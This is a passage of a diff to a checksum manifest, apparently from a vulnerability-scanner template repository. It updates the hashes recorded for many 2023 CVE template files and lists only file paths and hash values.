+http/cves/2023/CVE-2023-24735.yaml:798a0644a6f587cba391e0c4961fb65c23b5be7b +http/cves/2023/CVE-2023-24737.yaml:e908a841783481bb6076502ff80fe24f55cdc07d +http/cves/2023/CVE-2023-2479.yaml:a8d07e5b7b1f67b26ab9b7da395b407731963a68 +http/cves/2023/CVE-2023-25135.yaml:79052c6a9d0f339cf4678dd6f86dcc3d635123c2 +http/cves/2023/CVE-2023-25157.yaml:72d159aa24f1d5619484a3c71ef4dc55b3442d6a +http/cves/2023/CVE-2023-25194.yaml:ac4f9b068ead0939cb0c4594cd0cc167adde15ab +http/cves/2023/CVE-2023-25346.yaml:927dea62b1096bc9bbd1252b7ed33c0896cb5cc1 +http/cves/2023/CVE-2023-25573.yaml:88fd978e3618f24e47f91a04054eb7c4dfd0b6d8 +http/cves/2023/CVE-2023-25717.yaml:da602abf26a0f232d0b1dc69e47cbd6558d75fba +http/cves/2023/CVE-2023-26035.yaml:0bfdc98c4f6e89d83c4a57819408a9414c8878a2 http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 -http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 -http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f -http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda -http/cves/2023/CVE-2023-26360.yaml:8985b3d841f6b32d33228f02fb4a29cfd1c2f647 -http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 +http/cves/2023/CVE-2023-26255.yaml:f0575f5af6b800ee96420011038c6e88d8553bb9 +http/cves/2023/CVE-2023-26256.yaml:4076934b1cf4dec9d2d68d5bc370d114d4f657ad +http/cves/2023/CVE-2023-26347.yaml:0388c53de52772e2015a0c467dccf94e6e568fa9 +http/cves/2023/CVE-2023-26360.yaml:fd2e3196bb84bd3bd861086b342978b9f7ac5e43 +http/cves/2023/CVE-2023-26469.yaml:73a3992126d3fdb82794695dd93297dc3f0312ff http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 -http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 -http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323 -http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432 -http/cves/2023/CVE-2023-27032.yaml:ff5f86063146df89d119061535c3d6cfa9c74474 -http/cves/2023/CVE-2023-27034.yaml:e2c1ce7882a10ef1b7e9126950304588d00ff267 -http/cves/2023/CVE-2023-27159.yaml:2687d77e90b419ac3a52ddc4e837eeb6135a6da6 -http/cves/2023/CVE-2023-27179.yaml:37e8c6b241909fc9025935c171317ee092f9b206 -http/cves/2023/CVE-2023-27292.yaml:e1e1459e70a9ca5c46dea4805292a28d3a3a19f3 -http/cves/2023/CVE-2023-2732.yaml:79fd7aa6bec37d483cfb379d64ec6c3e4cc9643e -http/cves/2023/CVE-2023-27350.yaml:67ce93d1dc0cae57f69ff987e8b286f20793092a -http/cves/2023/CVE-2023-27372.yaml:e833064281153ce8ac7a02f887ae3f68a226a81e -http/cves/2023/CVE-2023-27482.yaml:ea41159de1f086c65bf2457ced086d7f14253a0a -http/cves/2023/CVE-2023-27524.yaml:a88fb9d85f69836b3bcb45a35d3a0dbb1d04b62b -http/cves/2023/CVE-2023-27587.yaml:2b0120a91f748c89e4076fcb9da3bf146ac2fa48 -http/cves/2023/CVE-2023-27639.yaml:3abc73340d360a90f169d8020391b1bfa3648ac4 -http/cves/2023/CVE-2023-27640.yaml:2638f8d763d700bc5b7d44250d23c48acd14ea75 -http/cves/2023/CVE-2023-2766.yaml:a95114658ff96257f11b7dbefd91301f9c69d7cb -http/cves/2023/CVE-2023-2779.yaml:9d509e4687d753c62893603a17885a4513ec3d67 -http/cves/2023/CVE-2023-2780.yaml:20484e2a61e30cd318623f01f9cd9fbaedaff4ac -http/cves/2023/CVE-2023-27922.yaml:258b050c0bd24620658a6be06a2354a3af0b6037 -http/cves/2023/CVE-2023-2796.yaml:a25d85c244928e675267d06c4976d84d1a72d3d3 -http/cves/2023/CVE-2023-28121.yaml:49ee6dc575ca492684912f95dbcc8810f3f29de0 -http/cves/2023/CVE-2023-2813.yaml:485032b8c58efb4cdeb458a4387374d6faa9c4c5 -http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e -http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac -http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c -http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1 -http/cves/2023/CVE-2023-28662.yaml:ad336c6a3427d0b47407455c18a117052d0bff5a -http/cves/2023/CVE-2023-28665.yaml:f7cbf06ff60743045c2b85276c87e28b0182c049 -http/cves/2023/CVE-2023-29084.yaml:c13b9fdcac929cdff02edcde7bd85a1b97fd8c31 -http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a -http/cves/2023/CVE-2023-29300.yaml:058aae0088baca6c4104fd3ed918e5c69b98c06f -http/cves/2023/CVE-2023-29357.yaml:f024b56091f0df09f899d7dce5127f26be7f53e0 -http/cves/2023/CVE-2023-29439.yaml:d4dcbb476711e37b1aefb260fada7f7c73bc587e -http/cves/2023/CVE-2023-2948.yaml:7ad9cd30952a0ea7e9166d7fb65ef1c220b258ef -http/cves/2023/CVE-2023-29489.yaml:47180817e6bc2c1554749248108d72d58a282932 -http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 -http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 -http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 -http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 -http/cves/2023/CVE-2023-29827.yaml:90f368b70e029388425d8a5ce9c20f8653d6b77b -http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8 -http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e -http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5 -http/cves/2023/CVE-2023-29923.yaml:1af1cf8450a5c134bea04ba99ffdfc4fb1a35007 -http/cves/2023/CVE-2023-30013.yaml:4acc40ab863e771280c4a2342f99da6e83516ae6 -http/cves/2023/CVE-2023-30019.yaml:5f2d50fd372075aba087aec7a54079ffe951f85c -http/cves/2023/CVE-2023-30150.yaml:66829edcfb662a8c014d6d114af6c6efa3195958 -http/cves/2023/CVE-2023-30210.yaml:8d94b5c27055a849583fa596459504ed2186adcc -http/cves/2023/CVE-2023-30212.yaml:2b2fe5a177a8a63433016866132889649146b4f4 -http/cves/2023/CVE-2023-30256.yaml:c8ff7db1046cfba64af40cf83389cb0aecad9dd6 -http/cves/2023/CVE-2023-30258.yaml:778e4e61140adf7c5254116c77fc8a4ae90c59db -http/cves/2023/CVE-2023-30534.yaml:1e7e038bd6a2c2f5cba13e80bcd1a2ce1faea3c5 -http/cves/2023/CVE-2023-30625.yaml:07288271ea2118572d231f5b97192b928d4adc41 -http/cves/2023/CVE-2023-3077.yaml:d3b8b7a4a10118402a6d5118a60abf75a01c954c -http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 -http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 -http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c -http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36 -http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3 -http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee -http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9 -http/cves/2023/CVE-2023-32077.yaml:209f5ecaac978f98f6002f5813e39d9f49226d5c +http/cves/2023/CVE-2023-26842.yaml:10cae8b4f3df387b1c4a37df6d7e2aedbf2d4f54 +http/cves/2023/CVE-2023-26843.yaml:13eedeb5f7c849016f32a2f45ba7f173c6b2bdc3 +http/cves/2023/CVE-2023-27008.yaml:09fcde0a313c113f34dafaa28c97666e0283d093 +http/cves/2023/CVE-2023-27032.yaml:d7be4494adad630ba076f9c07c53906d527fb723 +http/cves/2023/CVE-2023-27034.yaml:e97a62db332d16cad3a1cdb7830dfb87e1cef496 +http/cves/2023/CVE-2023-27159.yaml:c90e213d2262b9f193e525df1a7116d821023d2b +http/cves/2023/CVE-2023-27179.yaml:32e83ec871e822179dc7699285fafe32d4356cb8 +http/cves/2023/CVE-2023-27292.yaml:b52dc9ce1aeb127e2ab870ee5356d6ad0b000ca6 +http/cves/2023/CVE-2023-2732.yaml:378ae0f10a3912827d7c15919f8e1a6d0fe2f9ea +http/cves/2023/CVE-2023-27350.yaml:f0dd62057770227455d6cae2d5b30ac35286a438 +http/cves/2023/CVE-2023-27372.yaml:72c58a1d9c3f0ae3e29c7a6705aefea08672217a +http/cves/2023/CVE-2023-27482.yaml:a1f7bfaded3952990e267ace21564c1e7c30a343 +http/cves/2023/CVE-2023-27524.yaml:8b8310c667682faa2e5979cc13a81f073fea7fbd +http/cves/2023/CVE-2023-27587.yaml:60a08e795ba4fba51267211fb6b52965ea1186eb +http/cves/2023/CVE-2023-27639.yaml:ef6e0c1b295a1edd56cf92d1a064ae083f285a3f +http/cves/2023/CVE-2023-27640.yaml:8a848a7e9f380368c06dc6e6b9ad1a709d6bd6f0 +http/cves/2023/CVE-2023-2766.yaml:9ca36e1763589a1d8c809a724ee0cfd23ea295e0 +http/cves/2023/CVE-2023-2779.yaml:eafff3164c677d37a04194bcdc51b533692ee55e +http/cves/2023/CVE-2023-2780.yaml:f72133ca5cf8d976108d6d4b2f907e60cf0199ef +http/cves/2023/CVE-2023-27922.yaml:ba8517cad621418eadabe8601686d65428dd2b7d +http/cves/2023/CVE-2023-2796.yaml:4735c6740dd51b254556735690d36d69426bf740 +http/cves/2023/CVE-2023-28121.yaml:38b48c61d43bfa70415fa970ee25ed4f8ea05fc5 +http/cves/2023/CVE-2023-2813.yaml:14383aa3525cfbbc844f2caff67cda4f6dfc733b +http/cves/2023/CVE-2023-2822.yaml:760308ee5e17848b176d6465ab18679d582be37e +http/cves/2023/CVE-2023-2825.yaml:ae1cd203cc26527280ca32998f788de89e44d260 +http/cves/2023/CVE-2023-28343.yaml:1234c116ca3e732396624b0aac258298782693b1 +http/cves/2023/CVE-2023-28432.yaml:f58e470004f1d630158498724b2f3da592d8e239 +http/cves/2023/CVE-2023-28662.yaml:2abc573c9c427499910d2f2bf8e1df2054b36ffa +http/cves/2023/CVE-2023-28665.yaml:24a723b670bc1b3caf8fd461db06c6bd0d6e777f +http/cves/2023/CVE-2023-29084.yaml:53bb68cddf14ad14c675ea5000aea77e262b85a9 +http/cves/2023/CVE-2023-29298.yaml:108ee89e60348eee5337de28270b459a9b6d026b +http/cves/2023/CVE-2023-29300.yaml:966564784afefc7242bb44896d3fbfe7fe4404ac +http/cves/2023/CVE-2023-29357.yaml:8e303b57335b68a26186d19e776abfad5ecaa2bd +http/cves/2023/CVE-2023-29439.yaml:af7ce0ffcdeb120f84b8b6830db8e9e9e371a2f1 +http/cves/2023/CVE-2023-2948.yaml:7d521c83108d6c531128fd1e74c901a706b1935e +http/cves/2023/CVE-2023-29489.yaml:f60b01457d4b477ee696f93ddb2e30f326199c03 +http/cves/2023/CVE-2023-2949.yaml:bc04bcfa8a442507b21e06302481027378a377de +http/cves/2023/CVE-2023-29622.yaml:2e564b7bda7d640e39fac1933c50864584e35622 +http/cves/2023/CVE-2023-29623.yaml:f15162a4115311b0bc6b8fb6cd695eccd0d24bdf +http/cves/2023/CVE-2023-2982.yaml:45bc262a664404b8ce1c2095d2334b5bb727b2ba +http/cves/2023/CVE-2023-29827.yaml:c15a74c6266ecc649b994d35dcecf59ad32be5e4 +http/cves/2023/CVE-2023-29887.yaml:af9539787a7cf27ecc50593e77d29cd13ce9d5a7 +http/cves/2023/CVE-2023-29919.yaml:5c2c936f07167fa7dbd94388c6cfefca3ba163ec +http/cves/2023/CVE-2023-29922.yaml:2a03061feb29ae93404e8320e7c63333fb58bc09 +http/cves/2023/CVE-2023-29923.yaml:dedb7e0cdac4d0e63c1558d538f5809d61275682 +http/cves/2023/CVE-2023-30013.yaml:ac3c0f858a056ad35b10f220f83aa3f958acb4a7 +http/cves/2023/CVE-2023-30019.yaml:069417784eeeef2c4959a294cf9e0b92d1f45305 +http/cves/2023/CVE-2023-30150.yaml:189b89309f2ab8d59a6ef495c376449e2ac293ac +http/cves/2023/CVE-2023-30210.yaml:0f5dd2db899de17ca8b212e6041bd624873fdbfd +http/cves/2023/CVE-2023-30212.yaml:9163e8ec19a1bf4cfdd0155156bd6ce6f153d82d +http/cves/2023/CVE-2023-30256.yaml:71711039f3cb6107e806ed08d98a5036c84084cb +http/cves/2023/CVE-2023-30258.yaml:07f7ea3461b41bd4da542b84d2b7498ebb399ea0 +http/cves/2023/CVE-2023-30534.yaml:bf7eebcc4d7fa40e9ab8c834575b17f0c33837c9 +http/cves/2023/CVE-2023-30625.yaml:277f7151436a4b50fecc6745ab46954d96c42ff3 +http/cves/2023/CVE-2023-3077.yaml:a503e8b074518b7a630c790c4bcf5096c83dafbc +http/cves/2023/CVE-2023-30777.yaml:db4827dfa54fec6242ce9ea4c772addb723391e8 +http/cves/2023/CVE-2023-30868.yaml:848d6ae085a1d58172cc7cb997ac51d688c3cd21 +http/cves/2023/CVE-2023-30943.yaml:9400ebc63cca40f491a4765089051822f49ab048 +http/cves/2023/CVE-2023-31059.yaml:ed6ed4b07a7aba43ea08d5b1001192a03a96d434 +http/cves/2023/CVE-2023-31446.yaml:2ffab63d38fd32eb0e649311f4e7238a9279a061 +http/cves/2023/CVE-2023-31465.yaml:84b38d7e29d648c19439f6fb1e2b2a94f40a361a +http/cves/2023/CVE-2023-31548.yaml:9b2972a6c1a4ddcbc803f5471758804aa305e539 +http/cves/2023/CVE-2023-32077.yaml:101a39d9204f5baf01f2affa1fb80cc72890b87f http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b -http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca +http/cves/2023/CVE-2023-3219.yaml:c46ed7525586b1c547845920673b96a6e86127a0 http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 -http/cves/2023/CVE-2023-32243.yaml:bcbf1f8b9ae1c03a606866feaffa2c71ba08878b -http/cves/2023/CVE-2023-32315.yaml:4006dcea314168a66f3d898049017ac193275066 -http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 -http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a -http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c -http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 -http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 -http/cves/2023/CVE-2023-3345.yaml:a80c20db1df0f1413c0f14c1d90a40138b305dec -http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc -http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 -http/cves/2023/CVE-2023-33584.yaml:b4310ef83324d4f6e1e0d74751be0f3a82f927a3 -http/cves/2023/CVE-2023-33629.yaml:7aea9ab46b0fc26a84341bf7b4f668fcab8cc28c -http/cves/2023/CVE-2023-3368.yaml:5ece2a45a0b0a28ef3af6a6a7fd25b7acfdbe6c7 -http/cves/2023/CVE-2023-33831.yaml:0a2a23223fc63497dc033c19e0b6e7661f7c0c06 -http/cves/2023/CVE-2023-34020.yaml:cc755f57124860a886c31aacf364b0d14ac9cb71 -http/cves/2023/CVE-2023-34124.yaml:4e3e82c80a9fcd2f5c1e1d3e1cee8623bb1f9d04 +http/cves/2023/CVE-2023-32243.yaml:8ae07df0b47534703abacd4d2c9474cca42f155b +http/cves/2023/CVE-2023-32315.yaml:8cf24a6668a033f97bd47995c00cdfbf712cf7f4 +http/cves/2023/CVE-2023-32563.yaml:95800677fc85fb7a2999fc4dc0ecf4e14bdca824 +http/cves/2023/CVE-2023-33338.yaml:c9eed5096c30da7f644c453c160feabc8a4355d9 +http/cves/2023/CVE-2023-33405.yaml:a640122d300395a4e99b838b7d061964f71e2f7e +http/cves/2023/CVE-2023-33439.yaml:8a4ef47375c4439dba0466e6fb47fb8db3a6bbec +http/cves/2023/CVE-2023-33440.yaml:374a71661f7cb91affcdf607230fed081f768e1e +http/cves/2023/CVE-2023-3345.yaml:cb4f16c52525fd9d663107fa526a3b492ebe2f51 +http/cves/2023/CVE-2023-33510.yaml:99678e95f4277c8a99b1dc46a24ca66e629a223a +http/cves/2023/CVE-2023-33568.yaml:f46aad9a8833fa3fd49afb682fbdacd7059e3f66 +http/cves/2023/CVE-2023-33584.yaml:eafc5fa5e6d962f60a0d1c322d0c5da4a2729a86 +http/cves/2023/CVE-2023-33629.yaml:13e85760aa63f2c8756ecec84fbe8e154b50a41e +http/cves/2023/CVE-2023-3368.yaml:dba7d3e69bd350c5b5abfcf5c0fabaa0af3f1d93 +http/cves/2023/CVE-2023-33831.yaml:4d063581ef083cada73ee70f294f1ce4ab5aea08 +http/cves/2023/CVE-2023-34020.yaml:8703548ce5bb1c081556a2765db8d12b798a1e12 +http/cves/2023/CVE-2023-34124.yaml:ed112c5205c463f82545b656dfff5121e3980c08 http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a -http/cves/2023/CVE-2023-34259.yaml:c522d53c7b0766136d4356c8330eb60fbe2ff6a7 -http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c -http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c -http/cves/2023/CVE-2023-34598.yaml:586bd46c54d95b6e72b3840c99dd993b235c68b8 -http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 -http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 -http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 -http/cves/2023/CVE-2023-34751.yaml:725022730026691d6d788f2e23664b9068db36a6 -http/cves/2023/CVE-2023-34752.yaml:e188543250435b6a6dc5e1082a9cdb02a17bc5f5 -http/cves/2023/CVE-2023-34753.yaml:a00f3be744f311682d287745befc1f2791ff048a -http/cves/2023/CVE-2023-34755.yaml:722ed8e491656a0e3658aa09b661840b2d0976be -http/cves/2023/CVE-2023-34756.yaml:0b047d7507c88393767381e7fe2ddf08284642a8 -http/cves/2023/CVE-2023-3479.yaml:6f3bf666456a848c581cd6287fa4540e27356940 -http/cves/2023/CVE-2023-34843.yaml:c6ee0f338d06e64df059f27d46987949cc0ca00a -http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe -http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22 -http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d -http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae -http/cves/2023/CVE-2023-35158.yaml:93718c34c9acb11a626e4076fe6f21953401b5a4 -http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd -http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 -http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 -http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 -http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 -http/cves/2023/CVE-2023-36284.yaml:8b045d86f4ab7fd4d1dfb171450a2cc5bc9d270c -http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 -http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 -http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 -http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b -http/cves/2023/CVE-2023-36347.yaml:80107e418716ca04fb08977e478af1dde95045f3 -http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 -http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 -http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef -http/cves/2023/CVE-2023-3710.yaml:b2be8a781103b6505a95ec075e384c01ca46d9cf -http/cves/2023/CVE-2023-37265.yaml:f4fd0861590c0f3e9ef2cd2449b9bbd4b180e78e -http/cves/2023/CVE-2023-37266.yaml:29dca60c3b36905d26cbcb336995e2db7af88535 -http/cves/2023/CVE-2023-37270.yaml:7021ddf67a9a7d0e223fd0058f39f9d9d93ee50d -http/cves/2023/CVE-2023-37462.yaml:e95ff52904870987f3f2724849653753f3004ca5 -http/cves/2023/CVE-2023-37474.yaml:1382e6f8734c475fdfa9ac81718c3240fbb2153a -http/cves/2023/CVE-2023-37580.yaml:05c627b76d0ee6c8933ae7718273170cb1d01328 -http/cves/2023/CVE-2023-37629.yaml:1c11ce54a7c84be5200d518fd211de5122cef10d -http/cves/2023/CVE-2023-3765.yaml:fe25e60403d8d565e54e667bfa00fa3bec54380e -http/cves/2023/CVE-2023-37679.yaml:4b98e576c7009ac3b16b275285e047004ba4c40d -http/cves/2023/CVE-2023-37728.yaml:95a98690b4984e97751535c02f678dd53be471dd -http/cves/2023/CVE-2023-37979.yaml:24cc2256d77fd5d0ab9605e461faf49360dfa8f7 -http/cves/2023/CVE-2023-38035.yaml:31898b98cb997d4a88c0165c477a6f4a184397a6 -http/cves/2023/CVE-2023-38203.yaml:1907d7665cc9279b963fffc01fd5ca596579e404 -http/cves/2023/CVE-2023-38205.yaml:aaebf7cec9d2c43b5320476d015492a3f0e63e2c -http/cves/2023/CVE-2023-3836.yaml:3f6dbda40801fd34f5a41e95b84b0ee21c28dfd2 -http/cves/2023/CVE-2023-3843.yaml:107a648ee00f910c70584d6bcc276fb07f8c9626 -http/cves/2023/CVE-2023-38433.yaml:a36bbc02d17405903a77d1eca481abcde4613ee2 +http/cves/2023/CVE-2023-34259.yaml:53d252753ec9ffdb7385613c9fc1e7acff11f706 +http/cves/2023/CVE-2023-34362.yaml:2defe48ad70af441465ed508caaed981af0825c6 +http/cves/2023/CVE-2023-34537.yaml:de72e5d681a186ec3cd07866bd4ecbfa04344976 +http/cves/2023/CVE-2023-34598.yaml:31027299b822e6295019acf7ef142e50f6403be0 +http/cves/2023/CVE-2023-34599.yaml:1b3ef5d79d30b77550a4ebc0c4875257044f4360 +http/cves/2023/CVE-2023-3460.yaml:b7708c9ebad15739adf807650decba11fdb4ebaa +http/cves/2023/CVE-2023-34659.yaml:c30ad12e28880774e76add398eb672ed3e25a615 +http/cves/2023/CVE-2023-34751.yaml:8f9603914eb7aef1f81029aad80eb71604fa6dab +http/cves/2023/CVE-2023-34752.yaml:ff56504570eafb7792b5799e419679656609b222 +http/cves/2023/CVE-2023-34753.yaml:b7656cee1fb99f2107f0f738982662e8d7245b58 +http/cves/2023/CVE-2023-34755.yaml:3a3d1170074407156af957173fcd4a173163c75e +http/cves/2023/CVE-2023-34756.yaml:d1bc6393c9d7d9a7ad126dccc9df44bd169631b6 +http/cves/2023/CVE-2023-3479.yaml:0784a947aedebf06be9a59489f27e9809c6008ba +http/cves/2023/CVE-2023-34843.yaml:0f887df5018fcee007d9f4db1d230225d5ea5429 +http/cves/2023/CVE-2023-34960.yaml:4ac0866851e925322a4a45731b61aa1501f86812 +http/cves/2023/CVE-2023-34993.yaml:c900dca1572604053d61238fc052ef56f323d53b +http/cves/2023/CVE-2023-35078.yaml:b75286479f8e1d29956fdc7f9bc5ee75a449e9a6 +http/cves/2023/CVE-2023-35082.yaml:11b40acb6631fbeeaad7d0c53ffd73674010acb0 +http/cves/2023/CVE-2023-35158.yaml:d454ecf18e745f94f94e6ff53c024b4b567f17e2 +http/cves/2023/CVE-2023-35813.yaml:0c33f2cf908fb846444a9fe52e35ca988bbf45da +http/cves/2023/CVE-2023-35843.yaml:c1cc99b3a57a4224468c01aa6d71f3981711d543 +http/cves/2023/CVE-2023-35844.yaml:a25d1bfaa4d327f10d8e159876db043e4c12175c +http/cves/2023/CVE-2023-35885.yaml:83ea672d69a4e29cad43d7cf700a6d66c303c77b +http/cves/2023/CVE-2023-36144.yaml:71762c73decead0fc42e87a1e98f35a0b2529822 +http/cves/2023/CVE-2023-36284.yaml:6fdaf3119a0013f4533b6dc092188b8567774c24 +http/cves/2023/CVE-2023-36287.yaml:c521ad2d7d5ae1a871ebc35a4a15500462bbdb11 +http/cves/2023/CVE-2023-36289.yaml:3807badb58850b7acaaa06c11970e71dad06574a +http/cves/2023/CVE-2023-36306.yaml:13fb2c5b6a1653c9d9cb736ae4f782904737c268 +http/cves/2023/CVE-2023-36346.yaml:5791a6c2d336e3c899310082fda7b0c9ac10a92d +http/cves/2023/CVE-2023-36347.yaml:f684d219d03696666a15e76924aa7a5383753f39 +http/cves/2023/CVE-2023-36844.yaml:7dcd305c47dc04179ef10d8b3552a45aa16f5583 +http/cves/2023/CVE-2023-36845.yaml:a2d752e8d1ec8fc36029a21f54bb220bb9dc20da +http/cves/2023/CVE-2023-36934.yaml:10b5d186463b5f198af80ab025fe671eb1c77284 +http/cves/2023/CVE-2023-3710.yaml:bc15cfc8edecec55aada5edd5c261fb8d9212500 +http/cves/2023/CVE-2023-37265.yaml:00e3b3910291fd4c79d55a3662377f4f2cf4ddec +http/cves/2023/CVE-2023-37266.yaml:34c2063be8df16c0ba77ed1ef3b07dbf2af5ac16 +http/cves/2023/CVE-2023-37270.yaml:5419bb3c958b79043c409f887734b1912584232a +http/cves/2023/CVE-2023-37462.yaml:19ab85bbc2977b2891531e89feeba5ef66cb0ea6 +http/cves/2023/CVE-2023-37474.yaml:40bed5fd8b2c00e3ef251d18f8f02aaf30cf58f8 +http/cves/2023/CVE-2023-37580.yaml:c938dbecf98604df0f634282ec5b6219cbb94039 +http/cves/2023/CVE-2023-37629.yaml:4e68a34b5807294d0241d68a115e89609dc07174 +http/cves/2023/CVE-2023-3765.yaml:0c32fc7c9f67d3a5f4614a438d72e5b78486cc55 +http/cves/2023/CVE-2023-37679.yaml:1477d84b685e9596a4683b888bba12ef45315dc3 +http/cves/2023/CVE-2023-37728.yaml:ae8eefeec6f7ac2a1ae096f19cbccefa1f0d1b72 +http/cves/2023/CVE-2023-37979.yaml:c1db6eb563e1c4c88b768ddbf4134c0557c04161 +http/cves/2023/CVE-2023-38035.yaml:1e6f26ae79f4e647ad6e36692754f8c2e7e42531 +http/cves/2023/CVE-2023-38203.yaml:4abdf0b503ac93b779418c3dbc0be249193c6b21 +http/cves/2023/CVE-2023-38205.yaml:685f22ade81e6cd487981e113b06f7941d429806 +http/cves/2023/CVE-2023-3836.yaml:c55fd698b64e14277abada54ba78e8e8ab1610f6 +http/cves/2023/CVE-2023-3843.yaml:f1b1ed4a3ba55a1e6a6675d1cf6c9b4bc52b43a7 +http/cves/2023/CVE-2023-38433.yaml:8af19ca4d3a95914d516737976c68b75cc940e2f http/cves/2023/CVE-2023-3844.yaml:41358b9a547fc658630cd5192e8f5fd24359d2b1 -http/cves/2023/CVE-2023-3845.yaml:6b4b360583bd9f5ffad3d12b005765017d6dc4b4 +http/cves/2023/CVE-2023-3845.yaml:a058fa56bd9afd4c7fe9039d01299be7f2b0387b http/cves/2023/CVE-2023-3846.yaml:4ed1668afe32b491fdc55b828e4a5611c0967f44 -http/cves/2023/CVE-2023-3847.yaml:5ab9a60983bb1598cd708019b18e532841ec7772 -http/cves/2023/CVE-2023-3848.yaml:626c7451b8a7417718cdc68024755692bb45b6af -http/cves/2023/CVE-2023-3849.yaml:fc829971129fd5dd0e9f5efefcc0f9a8ce81db52 -http/cves/2023/CVE-2023-38501.yaml:105e3431e6c0c3cc63a89c92edd808e0e21ea0d8 -http/cves/2023/CVE-2023-38646.yaml:64213f51ae213555592207527e163a41e82c66ab -http/cves/2023/CVE-2023-38964.yaml:03b48ad92119668fb6e83bb4d65f686be71735de -http/cves/2023/CVE-2023-39002.yaml:6b28884d827963d2b420ca0054935711ae4e7ac7 -http/cves/2023/CVE-2023-39026.yaml:a51a79a6eb674c4075565e9dbbc5e77ecce8b8d3 -http/cves/2023/CVE-2023-39108.yaml:692192b618ece9c517379af9e65f86f9b29bf882 -http/cves/2023/CVE-2023-39109.yaml:fa658d913fd94a0c2aa9371b3a48232f299057e0 